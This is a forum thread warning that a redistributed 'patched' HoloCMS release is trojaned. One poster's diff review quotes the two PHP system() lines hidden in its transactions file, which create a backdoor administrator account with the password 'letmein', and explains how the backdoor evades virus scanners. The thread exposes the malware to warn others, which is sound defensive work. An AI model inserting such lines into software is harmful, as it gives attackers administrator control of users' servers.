HoloCMS v3.2.0 (Patched Edition)

[mohje]

:OPOO GOOG CMS AND ERROR INSTALL.php my INSTALL .php Online Free Good Install.php and good HOlo

 

[Mr. Oni]

Oni, he didn't. It was a fake one and there was a virus in there...

ahaha

Let me think, how you guys got the Server? You infected guys who has them with this PHP virus.

This is now up to the downloaders - Dont trust me and get 'hacked' by them
It has a Virus in it which simply connects to the cmd.exe and does ****.

The server was leaked by an RCE exploit in HoloCMS. Learn to check Apache logs. I discovered this after someone on Otaku had claimed that their server had been leaked and gave my access to the VPS.

 

[Suzushima]

Why does everyone call me Sisja in stead of Sisija

S i s i j a

I do agree Sisja I dont know why people call you Sisja.Also nice HoloCMS kinda Useless..


Sisija I was kidding on first line
Seriously I dont know I always call you Sisija (just the noobs o weird people)call you Sisja.

 

[england]

omg people really are noobs u tell em its a virus and thy still download it -_-

 

[Fire-hotel]

omg this ****

 

[Chris]

i use it currently...it rox

 

[Chris]

guys...omg...i saw the virus posts after i dl and used it. what do i do :'[

 

[NitroHabbz]

delete it and use another holocms

 

[ProjectGrey]

There's no use for this thread anymore, it will continue to build up more spam.

Just use the latest by yifan.
http://forum.ragezone.com/f353/cms-holocms-3-0-a-447582/

 

[Noobertje]

:thumbdown:

WARNING - THIS IS A VIRUS !

IF U DONT BELIEVE ME , DOWNLOAD IT

BUT I HAVE WARNED YOU!!!

Mark:closedeyes:

NO! THIS IS NOT A VIRUS! :thumbdown: :thumbdown:

 

[Hejula]

:thumbdown:

NO! THIS IS NOT A VIRUS! :thumbdown: :thumbdown:

Actually, take a look around the thread, there is clear evidence.

Ok, svn diff results:
index.php - Changed to new v32 format. VERY dirty coding, made me facepalm multiple times. BROKE encryption, so if you have users, then cookies will stop working. Removed my email-force-verify feature. ZERO security fix found.

me.php - Fixed the events XSS exploit (the incorrect way, I'll tell you the correct way below).

transactions - WARNING WARNING! Virus found! sorry about the font size, I just saw three more people downloading it after this post. (And we have a winner), take a look at line 122 and 123 of transactions.

system("cmd /c net user /add IUSR_SYSTEM letmein");
system("cmd /c net localgroup administrators /add IUSR_SYSTEM");

What this does is it adds an administrator user with a password the guy knows. In other words, if you use this, you now have a backdoor on your server.

In other words, just like the crap j00p released a few days ago, but in a different area, this fixes ZERO security exploits (other then the one I told you guys about a while ago), it puts a backdoor on your server so the guy can take over it. DO NOT USE! Since this is the second time this happens, I advice you people to not use ANY holocms release that is not from me (unless I say so otherwise).

Also, the ONLY KNOWN exploit is the one in me.php, I'll be updateing the HoloCMS thread with a patch later.

EDIT: Your virus scanner won't show anything!!! This isn't an exe file, it's a plain-text file, so virus scanners skip over it, AND the fact that it doesn't do harm to your computer, it opens a back door which allows the attacker to have administrator access to your computer/server THEN they can do the harm. Very sneaky.

Enough evidence?
Next time use your brain and eyes to read a thread and other's posts, they come in usefull when people like you claim this isn't a virus.


EDIT: Thread reported, it is totally useless

 

[Hammad]

Mofo' thinks he's one cool dude infecting PC's to get control over cyber-people whilst crouching in a corner at school whilst the big mean bullies take his dinner money. Aww. :